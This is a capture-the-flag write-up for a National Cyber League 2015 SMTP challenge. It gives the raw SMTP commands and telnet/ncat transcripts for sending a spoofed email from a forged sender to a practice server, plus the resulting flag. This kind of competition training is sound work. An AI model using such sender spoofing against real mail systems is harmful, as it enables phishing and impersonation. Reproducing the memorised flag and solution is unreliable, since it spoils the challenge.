SMTP Challenge – Web 6 (Medium): National Cyber League (NCL) 2015 Post-Season
For a total of 300-points and using Node.js; this challenge required submitting a line-by-line solution via telnet or [ netcat / ncat / nc ].
The difficulty in this challenge came form having to craft the email in a very particular way which the server was expecting. For example: used the wrong syntax[1], improper use of case in the command(s) or spacing. Simply put, without the proper solution – the flag would not display.
Kudos to all who conqueror this challenge!
Question:
- Connect to the smtp server at sb1.cyberskyline.com:3060 and send an email to daniel@hacker.test from the address, user4928@hacker.test, with a title saying you have the latest exploit and he will open it, allowing you to unlock the flag.
- This SMTP server does not follow protocol exactly, but close enough.
- What is the flag you receive from sending the spoofed email?
Code:
HELO HACKER.TEST
MAIL FROM:<user4928@hacker.test>
RCPT TO:<daniel@hacker.test>
DATA
From: "user4928" <user4928@hacker.test>
To: "daniel" <daniel@hacker.test>
Subject: you have the latest exploit
.
QUIT
Answer/Solution:
Telnet:
$ telnet sb1.cyberskyline.com 3060 Trying 104.236.16.36... Connected to sb1.cyberskyline.com. Escape character is '^]'. 220 sb1.cyberskyline.com ESMTP CyberSkyline HELO HACKER.TEST 250 Hello HACKER, sb1.cyberskyline.com at your service MAIL FROM:<user4928@hacker.test> 250 OK Sounds good, I like this idea RCPT TO:<daniel@hacker.test> 250 OK Seems like a good person to write a note to DATA 354 Go ahead, send all the cyber big data From: "user4928" <user4928@hacker.test> To: "daniel" <daniel@hacker.test> Subject: you have the latest exploit . 250 Ok: I will try my best to send this, I'm the little server that could QUIT 221 Don't leave... I'm just a sad lonely server... closing connection. Your flag is NCL-SAAS-3564 Thank you for playing Connection closed by foreign host.
Netcat:
$ ncat sb1.cyberskyline.com 3060 220 sb1.cyberskyline.com ESMTP CyberSkyline HELO HACKER.TEST 250 Hello HACKER, sb1.cyberskyline.com at your service MAIL FROM:<user4928@hacker.test> 250 OK Sounds good, I like this idea RCPT TO:<daniel@hacker.test> 250 OK Seems like a good person to write a note to DATA 354 Go ahead, send all the cyber big data From: "user4928" <user4928@hacker.test> To: "daniel" <daniel@hacker.test> Subject: you have the latest exploit . 250 Ok: I will try my best to send this, I'm the little server that could QUIT 221 Don't leave... I'm just a sad lonely server... closing connection. Your flag is NCL-SAAS-3564 Thank you for playing
Reference:
[1] https://en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol#SMTP_transport_example